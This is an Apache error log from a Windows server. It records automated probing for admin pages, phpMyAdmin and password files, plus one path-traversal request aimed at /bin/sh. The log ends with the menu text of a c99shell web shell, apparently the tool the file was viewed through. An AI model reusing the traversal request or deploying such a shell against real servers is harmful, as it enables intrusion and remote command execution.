[Thu Jun 02 21:34:28.459583 2022] [proxy:error] [pid 8808:tid 20920] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.173.36:80 (192.168.173.36) failed
[Thu Jun 02 21:34:28.459583 2022] [proxy:error] [pid 8808:tid 20920] AH00959: ap_proxy_connect_backend disabling worker for (192.168.173.36) for 60s
[Thu Jun 02 21:34:28.459583 2022] [proxy_http:error] [pid 8808:tid 20920] [client 46.101.1.185:36680] AH01114: HTTP: failed to make connection to backend: 192.168.173.36
[Thu Jun 02 21:35:43.292914 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/admin.asp
[Thu Jun 02 21:35:46.428520 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/administrator.asp
[Thu Jun 02 21:35:47.785722 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] script not found or unable to stat: E:/nuevo/htdocs/noticias/administrator.pl
[Thu Jun 02 21:35:49.985326 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] script not found or unable to stat: E:/nuevo/htdocs/noticias/admin.pl
[Thu Jun 02 21:35:52.652931 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] script not found or unable to stat: E:/nuevo/cgi-bin/sqwebmail
[Thu Jun 02 21:35:53.854133 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] script not found or unable to stat: E:/nuevo/htdocs/noticias/default.asp
[Thu Jun 02 21:35:55.320536 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/login.asp
[Thu Jun 02 21:35:56.069337 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/login.pl
[Thu Jun 02 21:35:56.552938 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/logon.asp
[Thu Jun 02 21:35:57.270539 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/logon.pl
[Thu Jun 02 21:36:00.499745 2022] [authz_core:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 21:36:00.671345 2022] [authz_core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 21:36:00.733745 2022] [authz_core:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/index.php
[Thu Jun 02 21:36:06.802156 2022] [authz_core:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/.hta
[Thu Jun 02 21:36:07.004956 2022] [authz_core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/.htaccess
[Thu Jun 02 21:36:07.051756 2022] [authz_core:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/.htpasswd
[Thu Jun 02 21:36:27.752992 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/AT-admin.cgi
[Thu Jun 02 21:37:10.122667 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] script not found or unable to stat: E:/nuevo/htdocs/noticias/admin.cgi
[Thu Jun 02 21:37:18.078681 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/admin.asp
[Thu Jun 02 21:37:22.025488 2022] [cgi:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] script not found or unable to stat: E:/nuevo/htdocs/administrator.asp
[Thu Jun 02 21:37:23.304690 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/administrator.pl
[Thu Jun 02 21:37:25.785094 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/admin.pl
[Thu Jun 02 21:37:28.561899 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/cgi-bin/sqwebmail
[Thu Jun 02 21:37:29.809901 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/default.asp
[Thu Jun 02 21:37:31.307504 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/login.asp
[Thu Jun 02 21:37:32.056305 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/login.pl
[Thu Jun 02 21:37:32.555506 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/logon.asp
[Thu Jun 02 21:37:33.304308 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/logon.pl
[Thu Jun 02 21:37:36.720714 2022] [authz_core:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 21:37:36.798714 2022] [authz_core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 21:37:36.970314 2022] [authz_core:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/index.php
[Thu Jun 02 21:37:40.339920 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH00038: Forbidden: E:/nuevo/htdocs/noticias/aux doesn't point to a file or directory
[Thu Jun 02 21:37:43.241525 2022] [authz_core:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] AH01630: client denied by server configuration: E:/nuevo/htdocs/.hta
[Thu Jun 02 21:37:43.241525 2022] [authz_core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH01630: client denied by server configuration: E:/nuevo/htdocs/.htaccess
[Thu Jun 02 21:37:43.491126 2022] [authz_core:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] AH01630: client denied by server configuration: E:/nuevo/htdocs/.htpasswd
[Thu Jun 02 21:38:05.346764 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] script not found or unable to stat: E:/nuevo/htdocs/noticias/cachemgr.cgi
[Thu Jun 02 21:38:05.736765 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/AT-admin.cgi
[Thu Jun 02 21:38:16.578784 2022] [cgi:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] attempt to invoke directory as script: E:/nuevo/cgi-bin/
[Thu Jun 02 21:38:33.255213 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH00038: Forbidden: E:/nuevo/htdocs/noticias/com1 doesn't point to a file or directory
[Thu Jun 02 21:38:33.333213 2022] [core:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] AH00038: Forbidden: E:/nuevo/htdocs/noticias/com2 doesn't point to a file or directory
[Thu Jun 02 21:38:33.504813 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH00038: Forbidden: E:/nuevo/htdocs/noticias/com3 doesn't point to a file or directory
[Thu Jun 02 21:38:33.582813 2022] [core:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] AH00038: Forbidden: E:/nuevo/htdocs/noticias/com4 doesn't point to a file or directory
[Thu Jun 02 21:38:39.854025 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH00038: Forbidden: E:/nuevo/htdocs/noticias/con doesn't point to a file or directory
[Thu Jun 02 21:38:50.976844 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/admin.cgi
[Thu Jun 02 21:39:22.473299 2022] [core:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] AH00038: Forbidden: E:/nuevo/htdocs/aux doesn't point to a file or directory
[Thu Jun 02 21:39:48.728145 2022] [proxy:error] [pid 8808:tid 20616] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Thu Jun 02 21:39:48.728145 2022] [proxy_ajp:error] [pid 8808:tid 20616] [client 46.101.1.185:38902] AH00896: failed to make connection to backend: 127.0.0.1
[Thu Jun 02 21:39:49.055746 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] script not found or unable to stat: E:/nuevo/htdocs/cachemgr.cgi
[Thu Jun 02 21:40:01.364168 2022] [cgi:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] attempt to invoke directory as script: E:/nuevo/cgi-bin/
[Thu Jun 02 21:40:17.166995 2022] [core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH00038: Forbidden: E:/nuevo/htdocs/com2 doesn't point to a file or directory
[Thu Jun 02 21:40:17.416596 2022] [core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH00038: Forbidden: E:/nuevo/htdocs/com3 doesn't point to a file or directory
[Thu Jun 02 21:40:17.510196 2022] [core:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] AH00038: Forbidden: E:/nuevo/htdocs/com1 doesn't point to a file or directory
[Thu Jun 02 21:40:17.666196 2022] [core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH00038: Forbidden: E:/nuevo/htdocs/com4 doesn't point to a file or directory
[Thu Jun 02 21:40:24.530208 2022] [core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH00038: Forbidden: E:/nuevo/htdocs/con doesn't point to a file or directory
[Thu Jun 02 21:41:32.608728 2022] [authz_core:error] [pid 8808:tid 20616] [client 46.101.1.185:40020] AH01630: client denied by server configuration: E:/nuevo/licenses/
[Thu Jun 02 21:41:35.291933 2022] [proxy:error] [pid 8808:tid 21024] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Thu Jun 02 21:41:35.291933 2022] [proxy_ajp:error] [pid 8808:tid 21024] [client 46.101.1.185:40006] AH00896: failed to make connection to backend: 127.0.0.1
[Thu Jun 02 21:41:44.090348 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH00038: Forbidden: E:/nuevo/htdocs/noticias/lpt1 doesn't point to a file or directory
[Thu Jun 02 21:41:44.199548 2022] [core:error] [pid 8808:tid 20616] [client 46.101.1.185:40020] AH00038: Forbidden: E:/nuevo/htdocs/noticias/lpt2 doesn't point to a file or directory
[Thu Jun 02 21:42:30.890430 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH00038: Forbidden: E:/nuevo/htdocs/noticias/nul doesn't point to a file or directory
[Thu Jun 02 21:43:05.647291 2022] [authz_core:error] [pid 8808:tid 20616] [client 46.101.1.185:40020] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/phpMyAdmin
[Thu Jun 02 21:43:05.818892 2022] [authz_core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/phpMyAdmin2
[Thu Jun 02 21:43:08.143296 2022] [authz_core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/phpmyadmin2
[Thu Jun 02 21:43:22.542121 2022] [authz_core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH01630: client denied by server configuration: E:/nuevo/licenses/
[Thu Jun 02 21:43:31.449737 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:38908] AH00038: Forbidden: E:/nuevo/htdocs/noticias/prn doesn't point to a file or directory
[Thu Jun 02 21:43:34.569742 2022] [core:error] [pid 8808:tid 21024] [client 46.101.1.185:40024] AH00038: Forbidden: E:/nuevo/htdocs/lpt1 doesn't point to a file or directory
[Thu Jun 02 21:43:34.585342 2022] [core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH00038: Forbidden: E:/nuevo/htdocs/lpt2 doesn't point to a file or directory
[Thu Jun 02 21:44:20.340223 2022] [core:error] [pid 8808:tid 20920] [client 46.101.1.185:40008] AH00038: Forbidden: E:/nuevo/htdocs/nul doesn't point to a file or directory
[Thu Jun 02 21:44:53.193880 2022] [authz_core:error] [pid 8808:tid 21096] [client 46.101.1.185:40050] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin2
[Thu Jun 02 21:44:53.193880 2022] [authz_core:error] [pid 8808:tid 20920] [client 46.101.1.185:40068] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Thu Jun 02 21:44:55.814685 2022] [authz_core:error] [pid 8808:tid 20920] [client 46.101.1.185:40068] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpmyadmin2
[Thu Jun 02 21:45:19.479926 2022] [core:error] [pid 8808:tid 21096] [client 46.101.1.185:40050] AH00038: Forbidden: E:/nuevo/htdocs/prn doesn't point to a file or directory
[Thu Jun 02 21:46:36.575262 2022] [proxy:error] [pid 8808:tid 20920] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.173.36:80 (192.168.173.36) failed
[Thu Jun 02 21:46:36.575262 2022] [proxy:error] [pid 8808:tid 20920] AH00959: ap_proxy_connect_backend disabling worker for (192.168.173.36) for 60s
[Thu Jun 02 21:46:36.575262 2022] [proxy_http:error] [pid 8808:tid 20920] [client 46.101.1.185:40068] AH01114: HTTP: failed to make connection to backend: 192.168.173.36
[Thu Jun 02 21:57:08.282771 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 22:03:22.745829 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 22:30:01.078836 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 22:41:40.896066 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 23:01:13.628125 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 23:08:34.079299 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 23:13:49.636653 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 23:18:06.725105 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 23:19:13.633622 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 23:40:43.725688 2022] [core:error] [pid 8808:tid 20708] [client 193.106.191.48:39046] AH00126: Invalid URI in request POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
[Thu Jun 02 23:53:20.420617 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--